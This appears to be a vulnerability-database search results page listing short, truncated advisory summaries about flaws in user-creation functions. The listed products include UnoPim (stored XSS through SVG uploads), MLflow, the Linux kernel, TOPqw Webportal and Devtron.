182 matches found
PYSEC-2025-17
In mlflow/mlflow version 2.18, an admin is able to create a new user account without setting a password. This vulnerability could lead to security risks, as accounts without passwords may be susceptible to unauthorized access. Additionally, this issue violates best practices for secure user accou...
CVE-2025-26342
A CWE-306 "Missing Authentication for Critical Function" in maxprofile/accounts/routes.lua in Q-Free MaxTime less than or equal to version 2.11.0 allows an unauthenticated remote attacker to create arbitrary users, including administrators, via crafted HTTP requests...
Linux kernel 安全漏洞
Linux kernel is the kernel used by Linux, the open source operating system of the Linux Foundation in the United States. A security vulnerability exists in the Linux kernel, which originates in the rawnand submodule of the mtd module, where the allocation of the "user" pointer in the...
PT-2025-30870
Name of the Vulnerable Software and Affected Versions Linux kernel affected versions not specified Description The Linux kernel contains a flaw in the ipmi create user function within the IPMI message handler. An invalid pointer in the "intf" list iterator can occur if the correct "intf-intf num"...
Cross-Site Scripting (XSS)
unopim/unopim is vulnerable to Cross-Site Scripting XSS. The vulnerability is due to insufficient input validation in the Create User function, allowing attackers to exploit an SVG document to steal cookies...
GHSA-CGR4-C233-H733 UnoPim Stored XSS : Cookie hijacking through Create User function
Summary A vulnerability exists in the Create User process, allowing the creation of a new admin account with an option to upload a profile image. An attacker can upload a malicious SVG file containing an embedded script. When the profile image is accessed, the embedded script executes, leading to...
Cross-site Scripting (XSS)
Overview Affected versions of this package are vulnerable to Cross-site Scripting XSS through the Create User process, which involves uploading a profile image. An attacker can exploit this by uploading a malicious SVG file containing a maliciously crafted script, which executes when the profile...
UnoPim Stored XSS : Cookie hijacking through Create User function
Summary A vulnerability exists in the Create User process, allowing the creation of a new admin account with an option to upload a profile image. An attacker can upload a malicious SVG file containing an embedded script. When the profile image is accessed, the embedded script executes, leading to...
CVE-2024-52305 UnoPim Stored XSS : Cookie hijacking through Create User function
UnoPim is an open-source Product Information Management PIM system built on the Laravel framework. A vulnerability exists in the Create User process, allowing the creation of a new admin account with an option to upload a profile image. An attacker can upload a malicious SVG file containing an...
CVE-2024-52305 UnoPim Stored XSS : Cookie hijacking through Create User function
UnoPim is an open-source Product Information Management PIM system built on the Laravel framework. A vulnerability exists in the Create User process, allowing the creation of a new admin account with an option to upload a profile image. An attacker can upload a malicious SVG file containing an...
CVE-2024-52305
CVE-2024-52305 affects UnoPim (Laravel). The issue resides in the Create User flow, where uploading a profile image (notably SVG) can execute embedded scripts, enabling a stored XSS that can steal cookies and potentially hijack sessions. Affected versions include the UnoPim releases prior to the ...
CVE-2024-52305 UnoPim Stored XSS : Cookie hijacking through Create User function
UnoPim is an open-source Product Information Management PIM system built on the Laravel framework. A vulnerability exists in the Create User process, allowing the creation of a new admin account with an option to upload a profile image. An attacker can upload a malicious SVG file containing an...
PT-2024-35166 · Unopim · Unopim
Name of the Vulnerable Software and Affected Versions: UnoPim versions prior to 0.1.5 Description: A vulnerability exists in the Create User process, allowing the creation of a new admin account with an option to upload a profile image. An attacker can upload a malicious SVG file containing an...
CVE-2024-45875
The CVE concerns baltic-it TOPqw Webportal 1.35.287.1, with a fix in 1.35.291. The vulnerability exists in the create user function at /Apps/TOPqw/BenutzerManagement.aspx/SaveNewUser, where the JSON object username enables SQL query manipulation. This is a SQL injection in the user-creation path,...
baltic-it TOPqw Webportal 安全漏洞
baltic-it TOPqw Webportal is a web application developed by a social service provider of the German company baltic-it. It can be used to publicly view information about various facilities. A security vulnerability exists in baltic-it TOPqw Webportal version 1.35.287.1, which stems from a SQL...
Devtron SQL注入漏洞
Devtron is a Kubernetes cloud-native tool integration platform open-sourced by Devtron. A SQL injection vulnerability exists in Devtron prior to version 0.7.2, which stems from an authenticated user being able to execute malicious SQL queries via the CreateUser interface...
UnoPim Cross-site Scripting vulnerability
UnoPim 0.1.3 and below is vulnerable to Cross Site Scripting XSS in the Create User function. The vulnerability allows attackers to perform XSS in SVG file extension, which can be used to stealing cookies...
GHSA-HV6M-QJ65-26Q3 UnoPim Cross-site Scripting vulnerability
UnoPim 0.1.3 and below is vulnerable to Cross Site Scripting XSS in the Create User function. The vulnerability allows attackers to perform XSS in SVG file extension, which can be used to stealing cookies...
CVE-2024-50637
UnoPim 0.1.3 and below is vulnerable to Cross Site Scripting XSS in the Create User function. This allows attackers to perform XSS via an SVG document, which can be used to steal cookies...
UnoPim 安全漏洞
UnoPim is an open source Product Information Management PIM system based on the Laravel framework by UnoPim Open Source. A security vulnerability exists in UnoPim 0.1.3 and earlier versions, which stems from a cross-site scripting XSS vulnerability in the Create User function that allows an...